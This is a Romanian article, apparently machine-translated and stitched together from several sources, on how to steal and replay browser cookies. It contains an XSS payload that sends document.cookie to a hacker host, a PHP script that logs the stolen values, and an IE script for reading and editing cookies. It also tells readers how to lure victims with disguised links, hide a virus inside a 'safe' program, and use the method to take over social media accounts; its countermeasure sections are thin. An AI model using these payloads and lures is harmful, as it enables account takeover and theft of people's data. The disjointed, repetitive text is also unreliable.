Descărcați un program pentru a fura cookie-uri. O modalitate ușoară de a fura biscuiți. Instrumente și tehnici de piratare a cookie-urilor

Ce este un cookie?

Există un mecanism care permite serverului http să stocheze unele informații text, apoi contactați-o. Aceste informații numit cookie. În esență, fiecare cookie este o pereche: numele unui parametru și valoarea acestuia. Fiecărui cookie i se atribuie, de asemenea, domeniul căruia îi aparține. Din motive de securitate, în toate browserele serverului http îi este permis doar să acceseze cookie-ul domeniului său. În plus, cookie-urile pot avea o dată de expirare, caz în care vor fi stocate pe computer până la această dată, chiar dacă închideți toate ferestrele browserului.


De ce sunt importante cookie-urile?

Toate sistemele multi-utilizator folosesc cookie-uri pentru a identifica utilizatorul. Mai precis, conexiunea curentă a utilizatorului la serviciu, sesiune utilizator. Dacă cineva vă recunoaște cookie-urile, se va putea conecta în sistem în numele dvs. Pentru că în momentul prezent foarte puține resurse de Internet verifică modificările adresei IP în timpul unei sesiuni de utilizator.


Cum se schimbă sau se înlocuiește cookie-urile?

Dezvoltatorii de browser nu oferă instrumente încorporate pentru editarea cookie-urilor. Dar te poți descurca cu un blocnotes obișnuit.


Pasul 1: creați un fișier text cu text

Windows Registry Editor versiunea 5.00



@="C:\\IE_ext.htm"

Salvați-l sub numele IE_ext.reg

Pasul 2: Folosind fișierul creat, adăugați modificări la registrul Windows.

Pasul 3: creați un fișier text cu text

< script language="javascript">
external.menuArguments.clipboardData.setData(„Text” , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);


Salvați-l sub numele C:\IE_ext.htm

Pasul 4: Mergem pe site-ul web care ne interesează.

Pasul 5: Faceți clic dreapta faceți clic pe un spațiu gol din pagină și selectați un element de meniu „Lucrul cu cookie-uri”. Permite accesul la clipboard. Cookie-urile dvs. de pe acest site vor merge în clipboard. Puteți să le introduceți blocnotesul și să aruncați o privire.


Pasul 6: Pentru a schimba unele cookie-uri, editați fișierul C:\IE_ext.htm, înlocuind testnameîn numele cookie-ului, valoare de test- asupra semnificației sale, testdomain.ru– la domeniul site-ului. Dacă este necesar, adăugați mai multe linii similare. Pentru a ușura controlul, am adăugat la script rezultatul cookie-urilor curente înainte și după modificare: alert(external.menuArguments.document.cookie);

Pasul 7: Efectuați din nou Pasul 5, apoi reîmprospătați pagina.

Concluzie: vom accesa această resursă de internet cu cookie-uri actualizate.

Cum să furi cookie-uri folosind JavaScript?

Dacă un atacator reușește să găsească o oportunitate de a executa un script JavaScript arbitrar pe computerul victimei, atunci poate citi cookie-urile curente foarte ușor. Exemplu:


var str= document.cookie;

Dar va putea să le transfere pe site-ul său, deoarece, așa cum am indicat mai devreme, un script JavaScript nu va putea accesa un site situat pe un alt domeniu fără o confirmare suplimentară? Se pare că un script JavaScript poate încărca orice imagine aflată pe orice server http. În același timp, transferați orice informație text din solicitarea de descărcare către această imagine. Exemplu: http://hackersite.ru/xss.jpg?text_info Deci, dacă rulați acest cod:

var img= imagine nouă();

img.src= „http://hackersite.ru/xss.jpg?”+ encodeURI(document.cookie);


apoi cookie-ul va ajunge în cererea de a descărca „imaginea” și va „merge” la atacator.

Cum să gestionați astfel de solicitări de descărcare a unei „imagine”?

Un atacator trebuie doar să găsească o găzduire cu suport PHP și să plaseze acolo cod ca acesta:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Apoi toți parametrii de solicitare pentru acest script vor fi salvați în fișier log.txt. Tot ce rămâne este să înlocuiți scriptul JavaScript descris anterior http://hackersite.ru/xss.jpg la calea către acest script php.


Concluzie

Am arătat doar cel mai simplu mod de a exploata vulnerabilitățile XSS. Dar acest lucru demonstrează că prezența a cel puțin unei astfel de vulnerabilități pe un site de internet multi-utilizator poate permite unui atacator să-și folosească resursele în numele tău.

Imaginea arată că cookie-ul conține linia wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. Această valoare este în formă necriptată în cookie și poate fi interceptată cu ușurință folosind utilitarul Ahile, dar în cele mai multe cazuri în Ahile puteți vedea doar hash-ul unei anumite intrări. Înainte de a trimite cererea către server, puteți încerca să înlocuiți această linie cu oricare similară (deși în acest caz nu are rost) - numărul de încercări nu este limitat. Apoi, prin trimiterea acestei cereri către server folosind butonul Trimite, puteți primi un răspuns de la server destinat administratorului.

În exemplul anterior, puteți utiliza falsificarea directă a ID-ului utilizatorului. În plus, numele parametrului, înlocuind valoarea căruia oferă caracteristici suplimentare hacker, poate fi următorul: utilizator (de exemplu, USER=JDOE), orice expresie cu un șir ID (de exemplu, USER=JDOE sau SESSIONID=BLAHBLAH), admin (de exemplu, ADMIN=TRUE), sesiune (de exemplu , SESSION=ACTIVE), coș (de exemplu, CART=FULL), precum și expresii precum TRUE, FALSE, ACTIVE, INACTIVE. De obicei, formatați cookie-uri depinde foarte mult de aplicația pentru care sunt utilizate. Cu toate acestea, aceste sfaturi pentru găsirea defectelor aplicațiilor folosind module cookie se aplică aproape tuturor formatelor.

Contramăsuri din partea clientului împotriva extragerii cookie-urilor

În general, utilizatorii ar trebui să fie atenți la site-urile Web care utilizează cookie-uri pentru autentificare și pentru a stoca date sensibile. De asemenea, este necesar să ne amintim că un site Web care utilizează cookie-uri pentru autentificare trebuie să suporte cel puțin protocolul SSL pentru a cripta numele de utilizator și parola, deoarece în absența acestui protocol, datele sunt transmise necriptate, ceea ce face posibilă interceptarea acestuia. folosind cel mai simplu software pentru a vizualiza datele trimise prin rețea.

Kookaburra Software a dezvoltat un instrument pentru a facilita utilizarea cookie-urilor. Instrumentul se numește CookiePal ( http://www.kburra.com/cpal.html (vezi www.kburra.com)). Acest program este conceput pentru a alerta utilizatorul atunci când un site Web încearcă să instaleze un cookie pe mașină, iar utilizatorul poate permite sau refuza această acțiune. Funcții similare de blocare a cookie-urilor sunt disponibile astăzi în toate browserele.

Un alt motiv pentru instalarea regulată a actualizărilor browserului Web este că defectele de securitate ale acestor programe sunt identificate în mod constant. Așadar, Bennet Haselton și Jamie McCarthy au creat un script care, după ce face clic pe un link, preia cookie-uri de pe computerul clientului. Ca urmare, tot conținutul cookie-urilor care se află pe computerul utilizatorului devine disponibil.

Acest tip de hack se poate face și folosind mânerul

Pentru a mă asigura că astfel de lucruri nu amenință datele noastre personale, fac acest lucru singur și sfătuiesc pe toată lumea să actualizeze întotdeauna software-ul care funcționează cu cod HTML (clienți de e-mail, playere media, browsere etc.).

Mulți oameni preferă să blocheze pur și simplu cookie-urile, dar majoritatea site-urilor Web necesită cookie-uri pentru a fi navigate. Concluzie – dacă în viitorul apropiat va apărea o tehnologie inovatoare care să vă permită să faceți fără cookie-uri, programatorii și administratorii vor răsufla ușurați, dar deocamdată cookie-urile rămân o bucată delicioasă pentru un hacker! Acest lucru este adevărat, deoarece nu există încă o alternativă mai bună.

Contramăsuri la nivelul serverului

Când vine vorba de recomandări pentru securitatea serverului, experții dau un sfat simplu: nu utilizați mecanismul cookie decât dacă este absolut necesar! O atenție deosebită trebuie acordată la utilizarea cookie-urilor care rămân în sistemul utilizatorului după încheierea sesiunii de comunicare.

Desigur, este important să înțelegeți că cookie-urile pot fi folosite pentru a oferi securitate serverelor Web pentru autentificarea utilizatorilor. Dacă aplicația dvs. trebuie să utilizeze module cookie, ar trebui să configurați mecanismul cookie pentru a utiliza chei diferite cu o perioadă scurtă de valabilitate pentru fiecare sesiune și să încercați să nu puneți în aceste fișiere informații care ar putea fi folosite de hackeri pentru hacking (cum ar fi ADMIN= ADEVĂRAT).

În plus, pentru a oferi o mai mare securitate la manipularea cookie-urilor, puteți utiliza criptarea cookie-urilor pentru a preveni extragerea informațiilor sensibile. Desigur, criptarea nu rezolvă toate problemele de securitate atunci când lucrați cu tehnologie cookie, totuși, această metodă va preveni cele mai simple hack-uri descrise mai sus.

Ați observat că atunci când reveniți pe un site pe care l-ați vizitat deja, site-ul vă recunoaște și se deschide cu setările pe care le-ați aplicat data trecută? Da, și destul de des? Acest lucru se întâmplă datorită cookie-urilor care stochează informații despre vizitatori precum login, parola, ID-ul sesiunii și alte variabile necesare pentru a identifica vizitatorul și pentru a afișa conținutul paginii în funcție de preferințele utilizatorului alese în timpul ultimei vizite la resursă. Programul WebCookiesSniffer va arăta utilizatorului cookie-urile și conținutul acestora de pe site-urile pe care utilizatorul le vede în browser.

Vizualizați cookie-uri

Deschideți un site web și WebCookiesSniffer captează cookie-uri în timp real. Utilitarul adaugă toate modulele cookie capturate într-un tabel care stochează date despre gazdă, calea solicitării, lungime totală fișier cookie, numărul de variabile din fișierul cookie și cookie-ul însuși cu numele variabilelor și ale valorilor. Informații colectate despre cookie-uri WebCookiesSniffer poate salva într-un fișier text. Programul are, de asemenea, capacitatea de a genera un raport HTML pentru toate cookie-urile sau pentru cele selectate. Pentru ca programul să funcționeze, trebuie să instalați driverul WinPcap (situat în arhivă împreună cu WebCookiesSniffer). Pentru a schimba limba programului WebCookiesSniffer în rusă, copiați fișierul WebCookiesSniffer_lng.ini (inclus și în arhivă) în directorul cu utilitarul.

Capturi de ecran ale programului WebCookiesSniffer



Modalități de a fura biscuiți

Această metodă de hacking, furtul cookie-urilor, funcționează excelent și este folosită de mulți hackeri. Dacă vrei să-l încerci și tu, dar nu știi ce să faci, citește recomandările noastre.

Ce sunt cookie-urile?

Acestea sunt informații despre vizita unui utilizator pe un anumit site. Este depozitat într-un loc separat document text. Acolo puteți găsi o varietate de informații. Inclusiv date de conectare, parole, adrese cutiile poştale si numere de telefon. De aceea, spărgătorii se străduiesc să pună mâna pe aceste documente. Pentru a fura materialele de care au nevoie, hackerii recurg la diferite metode.

Modalități de a fura biscuiți

Vulnerabilitatea XSS

Poate fi găsit și folosit pe orice site web. Când un specialist găsește o vulnerabilitate, o implementează cod special. În funcție de scop, codurile sunt diferite, sunt scrise pentru o anumită resursă. Când un utilizator vizitează această pagină și o reîmprospătează, toate modificările sunt aplicate. Codul începe să acționeze - este încorporat în computerul victimei și colectează totul informatiile necesare din browser.

Pentru a introduce cod, puteți utiliza orice tip de vulnerabilitate - o eroare într-o resursă web, browser sau sistem de computer.

Există 2 tipuri de atacuri XSS:

Pasiv - direcționat către scriptul paginii. În acest caz, trebuie să căutați vulnerabilități în elementele paginii. De exemplu, o filă cu dialoguri, o casetă de căutare, un catalog video etc.

Activ - ar trebui să le cauți pe server. Sunt frecvente în special pe diverse forumuri, bloguri și chat-uri.

Cum să forțezi o persoană să aplice XSS?

Sarcina nu este ușoară, deoarece adesea pentru a activa codul trebuie să faceți clic pe linkul cu acesta. Puteți deghiza linkul și îl puteți trimite într-un e-mail împreună cu o ofertă interesantă. De exemplu, oferă o reducere mare într-un magazin online. De asemenea, puteți implementa toate acestea în imagine. Cel mai probabil, utilizatorul îl va vedea și nu va bănui nimic.

Instalarea unui sniffer

Aceasta este implementarea unor programe specializate pentru monitorizarea traficului pe dispozitivul altcuiva. Sniffer-ul vă permite să interceptați sesiunile transmise cu datele altor persoane. În acest fel puteți obține toate login-urile și parolele, adresele, orice informatii importante transmis prin rețea de către utilizator. În acest caz, atacurile sunt cel mai adesea efectuate asupra datelor HTTP neprotejate. Wi-Fi nesecurizat funcționează bine pentru asta.

Există mai multe moduri de a implementa un sniffer:

  • Copierea traficului;
  • Analiza datelor folosind atacuri de trafic;
  • Ascultarea interfețelor;
  • Inserarea unui sniffer într-o pauză de canal.
Înlocuirea cookie-urilor

Toate datele sunt stocate pe serverul web în forma sa originală. Dacă le schimbați, aceasta va fi considerată o înlocuire. Toate materialele primite pot fi folosite pe alt computer. Astfel vei primi acces complet la datele personale ale utilizatorului. Puteți modifica cookie-urile utilizând setările browserului, suplimentele sau programele speciale. Editarea este posibilă și în orice blocnotes standard de pe un computer.

Furtul cookie-urilor folosind un virus

Experții sfătuiesc să nu folosiți cookie-uri decât dacă există o nevoie specială pentru el. Dacă este posibil să le dezactivați, este mai bine să faceți acest lucru. Acest lucru se datorează faptului că cookie-urile sunt foarte vulnerabile. Ele sunt adesea furate de criminali. Din aceste fișiere puteți obține o cantitate imensă de informații personale confidențiale care vor fi folosite împotriva unei persoane. Cel mai periculos tip de fișiere sunt cele care rămân în sistem după ce sesiunea sa încheiat deja.

Cookie-urile sunt adesea furate folosind un utilitar antivirus. Acest lucru se face destul de simplu. Orice utilitar sigur este încorporat cu un virus care colectează anumite materiale de pe computer. Programul virus va fi conectat la serverul proprietarului său. Programul trebuie configurat astfel încât browserul să-l folosească ca server proxy.

Când programul ajunge pe PC-ul victimei, va începe automat să colecteze toate datele stocate și să vi le trimită.

Virușii sunt diferiți, funcțiile lor pot diferi și ele. Unele vă permit să controlați complet browserul și să vizualizați orice informație. Alții sunt capabili să fure materiale protejate. Alții colectează doar date nesecurizate.

Este posibil să aveți dificultăți la introducerea unui program de virus pe computerul altcuiva. Este necesar să forțați utilizatorul să îl descarce și să îl ruleze. Aici puteți fie să îi trimiteți o scrisoare cu un link către program, fie să treceți programul drept sigur și să așteptați ca persoana respectivă să îl descarce de pe site-ul dvs. web.

Cum să protejăm cookie-urile de furt?

Majoritatea resurselor web nu sunt suficient de protejate. Hackerii găsesc cu ușurință vulnerabilități și erori în aceste platforme.

Reguli de protecție a cookie-urilor:

  1. Conectați ID-ul computerului la sesiunea curentă. Apoi, când vă conectați pe site de pe un dispozitiv terță parte, va fi pornită o nouă sesiune, iar datele de la cea anterioară nu vor fi preluate.
  2. Legați sesiunea la browser. Același principiu va funcționa ca și în paragraful anterior.
  3. Criptați parametrii trimiși prin rețea. Atunci informațiile stocate în document nu vor fi de înțeles. Va fi inutil celui care l-a interceptat. Această tehnică nu vă va proteja 100% unii specialiști pot decripta orice materiale.
  4. Crea folder separat pentru identificatori.

Cum să aflați parola pentru contul altcuiva prin cookie-uri?

Pentru a obține datele de conectare ale altcuiva, trebuie mai întâi să ajungeți la fișierul în care a fost salvat.

Pentru cei care folosesc Mozilla Firefox trebuie să accesați fila instrumente, care se află în meniul principal. În continuare, în setările sistemului veți găsi secțiunea „Protecție”, unde ar trebui să căutați toate informațiile importante despre conturile de pe rețelele sociale. Toate parolele sunt ascunse, așa că faceți clic pe butonul „afișare”. Puteți instala imediat protecția și puneți un cod special. Atunci nimeni în afară de tine nu va primi aceste informații.

În Opera, numai numele de utilizator sunt disponibile pentru vizionare publică. Dar în meniu puteți găsi un manager de parole și puteți vedea tot ce este stocat pe computer. Lista completă este în manager. Pentru a accesa parolele trebuie să instalați o extensie suplimentară.

ÎN Google Chrome Toate aceste materiale pot fi văzute în setările avansate. Există o filă cu toate cookie-urile salvate.

Din păcate, standard browser de internet Explorer nu are astfel de caracteristici. Pentru a afla informații despre platformele web pe care le vizitează proprietarul PC-ului, trebuie să descărcați un program special. Îl puteți găsi pe Internet gratuit, este complet sigur, dar este mai bine să îl descărcați din surse de încredere. Nu uitați că orice program trebuie scanat de un antivirus. Acest lucru este valabil mai ales pentru acele utilitare care funcționează cu parole.

Această tehnică este potrivită doar pentru cei care au acces fizic la computerul victimei. De asemenea, puteți afla parola altcuiva dacă persoana sa conectat la platformă prin intermediul computerului dvs. și și-a salvat datele.

Programe pentru furtul cookie-urilor

Există multe forumuri de hackeri pe Internet în care hackerii comunică între ei. Oamenii merg acolo sperând să ajungă ajutor gratuit. Acolo puteți găsi un număr mare de programe diferite pentru hacking. Dorim să vă avertizăm că nu trebuie să aveți încredere în aceste programe. Utilitățile pentru furtul de la distanță cookie-uri de pe dispozitivul altcuiva sunt manechine sau programe viruși. Dacă descărcați acest software pe computer, cel mai probabil veți cădea în capcana unui escroc. Escrocii postează programe gratuit. Astfel, ei distribuie software viruși și câștigă controlul asupra computerelor altor persoane. În general, astfel de programe sunt o înșelătorie, veți înțelege acest lucru după interfața și conținutul lor. Dacă aveți de gând să utilizați orice software pentru a extrage fișiere, atunci lăsați-l să fie sniffers. Desigur, folosirea lor nu este atât de ușoară. Și nu este ușor să găsești un bun sniffer pe Internet. Dar un astfel de software este disponibil de la specialiști care ți-l pot vinde pentru bani. Amintiți-vă că există mulți escroci, fiecare cu trucurile lui. Ar trebui să aveți încredere doar în hackeri de încredere care au o bună reputație, au recenzii și au propriul lor site web.

În concluzie, aș dori să observ că furtul cookie-urilor este o metodă cu adevărat puternică, a cărei eficacitate este foarte mare. Dacă doriți să spargeți profilul cuiva pe o rețea de socializare sau mesagerie instant, asigurați-vă că luați în considerare această opțiune. Această metodă funcționează cel mai bine atunci când puteți utiliza computerul victimei. Este mult mai dificil să obții materiale de la distanță, dar poți folosi sfaturile noastre și poți încerca să pui în practică această metodă.

In sectiunea

V-ați întrebat vreodată cum unele site-uri web își personalizează vizitatorii? Acest lucru poate fi exprimat, de exemplu, în amintirea conținutului „coșului” (dacă acest nod este destinat vânzării de mărfuri) sau în modul de completare a câmpurilor unui formular. Protocolul HTTP care stă la baza funcționării World Wide Web nu are mijloacele de a urmări evenimentele de la o vizită la un site la altul, așa că a fost dezvoltat un add-on special pentru a putea stoca astfel de „stări”. Acest mecanism, descris în RFC 2109, inserează bucăți speciale de date cookie în cererile și răspunsurile HTTP care permit site-urilor web să-și urmărească vizitatorii.

Datele cookie pot fi stocate pe durata sesiunii de comunicare ( pe sesiune), rămânând în RAMîn timpul unei sesiuni și fiind șters atunci când browserul este închis sau chiar după ce a trecut o anumită perioadă de timp. În alte cazuri, acestea sunt permanente ( persistente), rămânând pe hard diskul utilizatorului ca fișier text. Acestea sunt de obicei stocate în directorul Cookies (%windir%\Cookies pe Win9x și %userprofile%\Cookies pe NT/2000). Nu este greu de ghicit că, după capturarea cookie-urilor pe Internet, un atacator poate uzurpa identitatea utilizatorului a acestui calculator, sau colectați informații importante conținute în aceste fișiere. După ce ați citit următoarele secțiuni, veți înțelege cât de ușor este de făcut.

Interceptarea cookie-urilor

Cea mai directă metodă este interceptarea cookie-urilor pe măsură ce sunt transmise prin rețea. Datele interceptate pot fi apoi utilizate atunci când vă conectați la serverul corespunzător. Această problemă poate fi rezolvată folosind orice utilitar de interceptare a pachetelor, dar unul dintre cele mai bune este programul lui Lavrenty Nikula ( Laurentiu Nicula) SpyNet/PeepNet. SpyNet include două utilitare care funcționează împreună. Program CaptureNet captează pachetul în sine și îl stochează pe disc, iar utilitarul PeepNet deschide fișierul și îl convertește într-un format care poate fi citit de om. Următorul exemplu este un fragment dintr-o sesiune de comunicare reconstruită de PeepNet, în timpul căreia cookie-ul servește la autentificarea și controlul accesului la paginile vizualizate (numele au fost schimbate pentru a păstra anonimatul).

GET http://www.victim.net/images/logo.gif HTTP/1.0 Accept: */* Referrer: http://www.victim.net/ Gazdă: www.victim.net Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah

Exemplul de mai sus arată un fragment de cookie plasat într-o solicitare HTTP care vine la server. Cel mai important domeniu este cuid=, care specifică un identificator unic utilizat pentru autentificarea utilizatorului pe nodul www.victim.net. Să presupunem că după aceasta atacatorul a vizitat nodul victim.net, a primit propriul său identificator și un cookie (presupunând că nodul nu plasează datele cookie în memorie virtuală, și le scrie hard disk). Atacatorul își poate deschide propriul cookie și poate înlocui ID-ul câmpului cuid= cu acesta din pachetul capturat. În acest caz, la conectarea la serverul victim.net, el va fi perceput ca utilizatorul ale cărui date cookie au fost interceptate.

Capacitatea de program PeepNet reluarea întregii sesiuni de comunicare sau a fragmentului acesteia facilitează foarte mult implementarea atacurilor de acest tip. Folosind un buton Du-te să-l ia! Puteți prelua din nou paginile pe care le-a vizualizat un utilizator folosind datele cookie-urilor capturate anterior de CaptureNet. În caseta de dialog utilitar PeepNet puteți vedea informații despre comenzile finalizate de cineva. Aceasta utilizează datele cookie interceptate de CaptureNet pentru autentificare. Observați cadrul situat în colțul din dreapta jos al casetei de dialog cu datele sesiunii și linia care urmează linia Cookie:. Acestea sunt datele cookie utilizate pentru autentificare.

Este un truc destul de frumos. În plus, utilitatea CaptureNet poate oferi intrare completă trafic în formă decriptată, ceea ce este aproape echivalent cu capacitățile utilităților profesionale, cum ar fi Sniffer Pro de la Network Associates, Inc. Cu toate acestea, utilitatea SpyNetȘi mai bine - îl poți obține gratuit!

Contramăsuri

Ar trebui să fiți atenți la site-urile care utilizează cookie-uri pentru autentificare și stocarea informațiilor sensibile de identificare. Un instrument care poate ajuta la securitate este Cookie Pal de la Kookaburra Software, care poate fi găsit la http://www.kburra.com/cpal.html. Acest produs softwareÎl puteți configura pentru a genera mesaje de avertizare pentru utilizator atunci când un site Web încearcă să utilizeze mecanismul cookie. În acest caz, puteți „privi în culise” și puteți decide dacă aceste acțiuni ar trebui permise. ÎN Internet Explorer Există un mecanism de suport pentru cookie-uri încorporat. Pentru a-l activa, lansați aplicația Opțiuni Internet în Panoul de control, accesați fila Securitate, selectați elementul Zona Internet, setați modul Nivel personalizat și, pentru date cookie permanente și temporare, setați comutatorul la Solicitare. Configurarea utilizării cookie-urilor în browserul Netscape se face folosind comanda Editare › Preferințe › Avansatși setarea modului Avertizează-mă înainte de a accepta un cookie sau Dezactivare module cookie (Fig. 16.3). Când acceptați un cookie, trebuie să verificați dacă acesta este scris pe disc și dacă site-ul Web colectează informații despre utilizatori.

Când vizitați un site în care cookie-urile sunt folosite pentru autentificare, trebuie să vă asigurați că numele de utilizator și parola pe care le furnizați inițial sunt criptate cu cel puțin Protocolul SSL. Apoi aceste informații vor apărea în fereastra programului PeepNet, cel puțin nu sub formă de text simplu.

Autorii ar prefera să evite în întregime cookie-urile dacă multe site-uri web vizitate frecvent nu ar necesita această opțiune. De exemplu, pentru serviciul Hotmail popular la nivel mondial Microsoft Cookie-urile sunt necesare pentru înregistrare. Deoarece acest serviciu folosește mai multe servere diferite în timpul procesului de autentificare, adăugarea acestora în zona Site-uri de încredere nu este atât de ușoară (acest proces este descris în secțiunea „Utilizarea cu înțelepciune a zonelor de securitate: o soluție comună la problema de control Activex”). În acest caz, desemnarea *.hotmail.com va ajuta. Cookies - departe de asta solutie perfecta probleme cu caracterul incomplet al protocolului HTML, dar abordările alternative par a fi și mai rele (de exemplu, adăugarea la adresa URL identificator, care poate fi stocat pe serverele proxy). Până când apare o idee mai bună, singura opțiune este să vă controlați cookie-urile folosind metodele enumerate mai sus.

Capturați cookie-uri prin URL

Să ne imaginăm ceva groaznic: utilizatorii de Internet Explorer fac clic pe hyperlinkuri special create și devin potențiale victime, riscând să le fie interceptate cookie-urile. Bennett Haselton ( Bennett Haselton) și Jamie McCarthy ( Jamie McCarthy) de la organizația de adolescenți Peacefire, care pledează pentru libertatea comunicării prin internet, a publicat un scenariu care dă viață acestei idei. Acest script preia cookie-urile de la computer client dacă utilizatorul său face clic pe un link conținut pe pagina respectivă. Ca urmare, conținutul cookie-ului devine disponibil pentru operatorii site-urilor web.

Această caracteristică poate fi exploatată în scopuri nefaste prin încorporarea etichetelor IFRAME în codul HTML al unei pagini Web, al unui e-mail HTML sau al postării unui grup de știri. Următorul exemplu, oferit de consultantul de securitate Richard M. Smith, demonstrează capacitatea de a utiliza mânerele IFRAME cu un utilitar dezvoltat de Peacefire.